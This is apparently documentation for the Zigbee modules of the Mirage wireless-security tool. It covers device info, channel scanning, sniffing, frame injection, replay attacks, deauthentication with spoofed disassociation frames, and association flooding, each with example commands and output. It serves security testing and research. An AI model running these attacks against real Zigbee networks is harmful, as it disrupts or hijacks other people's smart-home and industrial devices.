List of Zigbee Modules¶
zigbee_info¶
Presentation¶
zigbee_info gets informations on a given Zigbee interface. It can also show the different capabilities of the interface (SHOW_CAPABILITIES parameter).
Compatible devices¶
Input parameters¶
Name |
Default value |
Possible values |
Description |
|---|---|---|---|
INTERFACE |
rzusbstick0 |
rzusbstickX|<filename>.pcap |
Interface to analyse |
SHOW_CAPABILITIES |
yes |
yes|no |
Indicates if the capabilities of the interface should be displayed |
Output parameters¶
If the interface provided is
rzusbstickX:
Name
Possible values
Description
INTERFACE
rzusbstickX
Selected interface
MODE
NORMAL | JAMMING
Mode currently in use in the selected interface
SERIAL
<hexadecimal>
Device’s serial number
FIRMWARE_VERSION
<string>
Device’s firmware version
INDEX
#X
Device’s index number
If the interface provided is
<filename>.pcap:
Name
Possible values
Description
INTERFACE
<filename>.pcap
Selected interface
MODE
read | write
Mode in use
Usage¶
To get complete information about an interface, use the following command:
$ mirage zigbee_info
[INFO] Module zigbee_info loaded !
[INFO] RZUSBStick: Killerbee firmware in use.
┌─────────────┬──────────────┬───────────────┬──────────────────┬────────┐
│ Interface │ Device Index │ Serial number │ Firmware Version │ Mode │
├─────────────┼──────────────┼───────────────┼──────────────────┼────────┤
│ rzusbstick0 │ #0 │ FFFFFFFFFFFF │ KILLERB001 │ NORMAL │
└─────────────┴──────────────┴───────────────┴──────────────────┴────────┘
[INFO] Mirage process terminated !
zigbee_scan¶
Presentation¶
zigbee_scan scans the different zigbee channels to discover devices and PanIDs. It allows to configure the execution time (TIME parameter) along with the channels to scan (START_CHANNEL and END_CHANNEL parameters), and to select active or passive scanning (ACTIVE parameter).
Compatible devices¶
Input parameters¶
Name |
Default value |
Possible values |
Description |
|---|---|---|---|
INTERFACE |
rzusbstick0 |
rzusbstickX |
Interface to use |
START_CHANNEL |
11 |
<integer> |
First targeted channel |
END_CHANNEL |
26 |
<integer> |
Last targeted channel |
TIME |
10 |
<integer> |
Execution time |
ACTIVE |
yes |
<boolean> |
Use active scanning |
Output parameters¶
If no networks and no devices have been identified, then this module generates no output parameters.
If only one device is detected, the following output is produced:
Name
Possible values
Description
TARGET
<ZigBee address>
device’s address (if only one device detected)
TARGET_PANID
<hexadecimal, 2 bytes>
device’s panId (if only one device detected)
CHANNEL
<channel number>
device’s channel (if only one device detected)
If multiple networks and multiple devices are detected, the same output parameters are generated, but are suffixed by the number of the device :
Name
Possible values
Description
NETWORK_PANID1
<hexadecimal, 2 bytes>
1st detected network’s panID
NETWORK_CHANNEL1
<integer>
1st detected network’s channel
NETWORK_ASSOC_PERMIT1
<boolean>
1st detected network’s association acceptance
NETWORK_COORDINATOR1
<ZigBee address>
1st detected network’s coordinator
DEVICE_ADDR1
<ZigBee address>
1st detected device’s address
DEVICE_ROLE1
coordinator|end device|router
1st detected device’s role
DEVICE_CHANNEL1
<integer>
1st detected device’s channel
DEVICE_PANID1
<hexadecimal, 2 bytes>
1st detected device’s panID
NETWORK_PANID2
<hexadecimal, 2 bytes>
2nd detected network’s panID
NETWORK_CHANNEL2
<integer>
2nd detected network’s channel
NETWORK_ASSOC_PERMIT2
<boolean>
2nd detected network’s association acceptance
NETWORK_COORDINATOR2
<ZigBee address>
2nd detected network’s coordinator
DEVICE_ADDR2
<ZigBee address>
2nd detected device’s address
DEVICE_ROLE2
coordinator|end device|router
2nd detected device’s role
DEVICE_CHANNEL2
<integer>
2nd detected device’s channel
DEVICE_PANID2
<hexadecimal, 2 bytes>
2nd detected device’s panID
...
...
...
Usage¶
If you want to perform a passive scan, type the following command:
$ mirage zigbee_scan INTERFACE=rzusbstick0 TIME=20 ACTIVE=no
[INFO] Module zigbee_scan loaded !
[INFO] RZUSBStick: Killerbee firmware in use.
┌────────┬─────────┬───────────────────────┬─────────────────┐
│ Pan ID │ Channel │ Association permitted │ Nodes │
├────────┼─────────┼───────────────────────┼─────────────────┤
│ 0x3332 │ 12 │ unknown │ 0x0000(unknown) │
└────────┴─────────┴───────────────────────┴─────────────────┘
[INFO] Mirage process terminated !
If you want to perform an active scan, type the following command:
$ sudo mirage zigbee_scan INTERFACE=rzusbstick0 TIME=20 ACTIVE=yes
[INFO] Module zigbee_scan loaded !
[INFO] RZUSBStick: Killerbee firmware in use.
┌────────┬─────────┬───────────────────────┬─────────────────────┐
│ Pan ID │ Channel │ Association permitted │ Nodes │
├────────┼─────────┼───────────────────────┼─────────────────────┤
│ 0x3332 │ 12 │ no │ 0x0000(coordinator) │
└────────┴─────────┴───────────────────────┴─────────────────────┘
[INFO] Mirage process terminated !
zigbee_inject¶
Presentation¶
zigbee_inject allows to inject Zigbee frames. It allows to configure the target by channel, PanID and address (respectively the CHANNEL, TARGET_PANID and TARGET parameters), along with the execution time (TIME parameter) and the PCAP (PCAP_FILE parameter) from which to take the capture.
Compatible devices¶
Input parameters¶
Name |
Default value |
Possible values |
Description |
|---|---|---|---|
INTERFACE |
rzusbstick0 |
rzusbstickX |
Interface to use |
TARGET_PANID |
<hexadecimal, 2 bytes> |
Targeted PanID |
|
CHANNEL |
13 |
<integer> |
Targeted channel |
TARGET |
<ZigBee address> |
Targeted device |
|
TIME |
20 |
<integer> |
Execution time |
PCAP_FILE |
<file path> |
Capture file |
Output parameters¶
This module doesn’t provide any output parameters.
Usage¶
Basic Usage¶
To inject a packet stream from a file, for example /tmp/capture.pcap, type the following command:
$ mirage zigbee_inject CHANNEL=12 TARGET_PANID=0x3332 PCAP_FILE=/tmp/capture.pcap
[INFO] Module zigbee_inject loaded !
[INFO] RZUSBStick: Killerbee firmware in use.
[SUCCESS] PCAP file successfully loaded (DLT : 195) !
[INFO] Extracting packet stream from PCAP ...
[SUCCESS] Packet stream successfully extracted !
[INFO] Injecting ...
^C[INFO] Mirage process terminated !
Performing a replay attack¶
You can also easily perform a replay attack by combining this module with zigbee_sniff :
$ mirage "zigbee_sniff|zigbee_inject" zigbee_sniff1.CHANNEL1=12 zigbee_sniff1.TARGET_PANID=0x3332 zigbee_sniff1.PCAP_FILE=/tmp/zigbeereplay.pcap zigbee_sniff1.TIME=5
[INFO] Module zigbee_sniff loaded !
[INFO] Module zigbee_inject loaded !
[INFO] RZUSBStick: Killerbee firmware in use.
[SUCCESS] PCAP file successfully loaded (DLT : 195) !
[PACKET] [ CH:12|RSSI:-55dBm|LKI:255/255|CRC:OK ] << Zigbee - Application Data Packet | srcAddr = 0x0000 | destAddr = 0xFFFF | destPanID = 0x3332 | data = 00000000000000fffe0000426f6e6a6f757212353d >>
[PACKET] [ CH:12|RSSI:-55dBm|LKI:255/255|CRC:OK ] << Zigbee - Application Data Packet | srcAddr = 0x0000 | destAddr = 0xFFFF | destPanID = 0x3332 | data = 0000000000000000426f6e6a6f75722028626973297031bb >>
[PACKET] [ CH:12|RSSI:-55dBm|LKI:255/255|CRC:OK ] << Zigbee - Application Data Packet | srcAddr = 0x0000 | destAddr = 0xFFFF | destPanID = 0x3332 | data = 00000000000000fffe0000426f6e6a6f7572128684 >>
[INFO] Extracting packet stream from PCAP ...
[SUCCESS] PCAP file successfully loaded (DLT : 195) !
[SUCCESS] Packet stream successfully extracted !
[INFO] Injecting ...
[...]
zigbee_sniff¶
Presentation¶
zigbee_sniff allows to passively sniffs ZigBee frames. It allows to configure the target by channel, PanID and address (respectively the CHANNEL, TARGET_PANID and TARGET parameters), along with the execution time (TIME parameter) and the optional PCAP file (PCAP_FILE parameter) in which the capture will be saved.
Compatible devices¶
Input parameters¶
Name |
Default value |
Possible values |
Description |
|---|---|---|---|
INTERFACE |
rzusbstick0 |
rzusbstickX |
Interface to use |
TARGET_PANID |
<hexadecimal, 2 bytes> |
Targeted PanID |
|
CHANNEL |
13 |
<integer> |
Targeted channel |
TARGET |
<ZigBee address> |
Targeted device |
|
TIME |
20 |
<integer> |
Execution time |
PCAP_FILE |
<file path> |
Capture file |
Output parameters¶
Name |
Possible values |
Description |
|---|---|---|
INTERFACE |
rzusbstickX |
Interface used |
CHANNEL |
<integer> |
Channel used |
PCAP_FILE |
<file path> |
Capture file |
Usage¶
Basic Usage¶
To sniff on a given channel and PanID, type the following command:
$ mirage zigbee_sniff CHANNEL=12 TARGET_PANID=0x3332
[INFO] Module zigbee_sniff loaded !
[INFO] RZUSBStick: Killerbee firmware in use.
[PACKET] [ CH:12|RSSI:-55dBm|LKI:255/255|CRC:OK ] << Zigbee - Application Data Packet | srcAddr = 0x0000 | destAddr = 0xFFFF | destPanID = 0x3332 | data = 00000000000000fffe0000426f6e6a6f757212353d >>
[PACKET] [ CH:12|RSSI:-55dBm|LKI:255/255|CRC:OK ] << Zigbee - Application Data Packet | srcAddr = 0x0000 | destAddr = 0xFFFF | destPanID = 0x3332 | data = 0000000000000000426f6e6a6f75722028626973297031bb >>
[PACKET] [ CH:12|RSSI:-55dBm|LKI:255/255|CRC:OK ] << Zigbee - Application Data Packet | srcAddr = 0x0000 | destAddr = 0xFFFF | destPanID = 0x3332 | data = 00000000000000fffe0000426f6e6a6f7572128684 >>
^C[INFO] Mirage process terminated !
If you want to export the collected data to a PCAP file, uses the following command:
$ mirage zigbee_sniff CHANNEL=12 TARGET_PANID=0x3332 PCAP_FILE=/tmp/capture.pcap
[INFO] Module zigbee_sniff loaded !
[INFO] RZUSBStick: Killerbee firmware in use.
[SUCCESS] PCAP file successfully loaded (DLT : 195) !
[PACKET] [ CH:12|RSSI:-55dBm|LKI:255/255|CRC:OK ] << Zigbee - Application Data Packet | srcAddr = 0x0000 | destAddr = 0xFFFF | destPanID = 0x3332 | data = 00000000000000fffe0000426f6e6a6f757212353d >>
[PACKET] [ CH:12|RSSI:-55dBm|LKI:255/255|CRC:OK ] << Zigbee - Application Data Packet | srcAddr = 0x0000 | destAddr = 0xFFFF | destPanID = 0x3332 | data = 0000000000000000426f6e6a6f75722028626973297031bb >>
[PACKET] [ CH:12|RSSI:-55dBm|LKI:255/255|CRC:OK ] << Zigbee - Application Data Packet | srcAddr = 0x0000 | destAddr = 0xFFFF | destPanID = 0x3332 | data = 00000000000000fffe0000426f6e6a6f7572128684 >>
^C[INFO] Mirage process terminated !
Performing a replay attack¶
You can also easily perform a replay attack by combining this module with zigbee_inject :
$ mirage "zigbee_sniff|zigbee_inject" zigbee_sniff1.CHANNEL1=12 zigbee_sniff1.TARGET_PANID=0x3332 zigbee_sniff1.PCAP_FILE=/tmp/zigbeereplay.pcap zigbee_sniff1.TIME=5
[INFO] Module zigbee_sniff loaded !
[INFO] Module zigbee_inject loaded !
[INFO] RZUSBStick: Killerbee firmware in use.
[SUCCESS] PCAP file successfully loaded (DLT : 195) !
[PACKET] [ CH:12|RSSI:-55dBm|LKI:255/255|CRC:OK ] << Zigbee - Application Data Packet | srcAddr = 0x0000 | destAddr = 0xFFFF | destPanID = 0x3332 | data = 00000000000000fffe0000426f6e6a6f757212353d >>
[PACKET] [ CH:12|RSSI:-55dBm|LKI:255/255|CRC:OK ] << Zigbee - Application Data Packet | srcAddr = 0x0000 | destAddr = 0xFFFF | destPanID = 0x3332 | data = 0000000000000000426f6e6a6f75722028626973297031bb >>
[PACKET] [ CH:12|RSSI:-55dBm|LKI:255/255|CRC:OK ] << Zigbee - Application Data Packet | srcAddr = 0x0000 | destAddr = 0xFFFF | destPanID = 0x3332 | data = 00000000000000fffe0000426f6e6a6f7572128684 >>
[INFO] Extracting packet stream from PCAP ...
[SUCCESS] PCAP file successfully loaded (DLT : 195) !
[SUCCESS] Packet stream successfully extracted !
[INFO] Injecting ...
[...]
zigbee_deauth¶
Presentation¶
zigbee_deauth deauthenticates zigbee devices by sending repeatedly Disassociation Notifications. It allows to configure the targeted PanID (TARGET_PANID parameter), channel (CHANNEL parameter), the target device (TARGET parameter), the source address of the frames (SOURCE parameter) and the reason to put in the Disassociation Notifications (REASON parameter).
Compatible devices¶
Input parameters¶
Name |
Default value |
Possible values |
Description |
|---|---|---|---|
INTERFACE |
rzusbstick0 |
rzusbstickX |
Interface to use |
TARGET_PANID |
0x1234 |
<hexadecimal, 2 bytes> |
Targeted PanID |
CHANNEL |
13 |
<integer> |
Targeted channel |
TARGET |
<ZigBee device address> |
Targeted device |
|
SOURCE |
<ZigBee device address> |
Source address to use |
|
REASON |
1 |
<integer> |
Disassociation reason ID |
Output parameters¶
This module doesn’t provide any output parameters.
Usage¶
You can use this module to send packets to an end device by typing the following command:
$ mirage zigbee_deauth CHANNEL=12 TARGET_PANID=0x3332 TARGET=0x13A200403D57B7 SOURCE=0x13A200405DBCFB
[INFO] Module zigbee_deauth loaded !
[INFO] RZUSBStick: Killerbee firmware in use.
[INFO] PanID selected: 0x3332
[INFO] Target selected: 00:13:A2:00:40:3D:57:B7
[INFO] Source selected: 00:13:A2:00:40:5D:BC:FB
^C[INFO] Mirage process terminated !
By reversing the source and the target, you can also send packets to a coordingator with this command:
$ mirage zigbee_deauth CHANNEL=12 TARGET_PANID=0x3332 SOURCE=0x13A200403D57B7 TARGET=0x13A200405DBCFB
[INFO] Module zigbee_deauth loaded !
[INFO] RZUSBStick: Killerbee firmware in use.
[INFO] PanID selected: 0x3332
[INFO] Target selected: 00:13:A2:00:40:5D:BC:FB
[INFO] Source selected: 00:13:A2:00:40:3D:57:B7
^C[INFO] Mirage process terminated !
zigbee_floodassoc¶
Presentation¶
zigbee_floodassoc performs an association flooding attack. It allows to configure the targeted PanID (TARGET_PANID parameter), the targeted channel (CHANNEL parameter) and the targeted device (TARGET parameter).
Compatible devices¶
Input parameters¶
Name |
Default value |
Possible values |
Description |
|---|---|---|---|
INTERFACE |
rzusbstick0 |
rzusbstickX |
Interface to use |
TARGET_PANID |
0x1234 |
<hexadecimal, 2 bytes> |
Targeted PanID |
CHANNEL |
13 |
<channel number> |
Targeted channel |
TARGET |
<ZigBee address> |
Targeted device |
Output parameters¶
This module doesn’t provide any output parameters.
Usage¶
To perform an Association Flooding Attack, type the following command:
$ mirage zigbee_floodassoc CHANNEL=12 TARGET_PANID=0x3332 TARGET=0x13A200405DBCFB
[INFO] Module zigbee_floodassoc loaded !
[INFO] RZUSBStick: Killerbee firmware in use.
[INFO] PanID selected: 0x3332
[INFO] Coordinator selected: 00:13:A2:00:40:5D:BC:FB
[INFO] New address: 0xC854
[INFO] New address: 0xDCA1
[INFO] New address: 0xAB88
[INFO] New address: 0xFF61
[INFO] New address: 0x03F0
[INFO] New address: 0x0069
[INFO] New address: 0xB07E
[INFO] New address: 0x2004
^C[INFO] Mirage process terminated !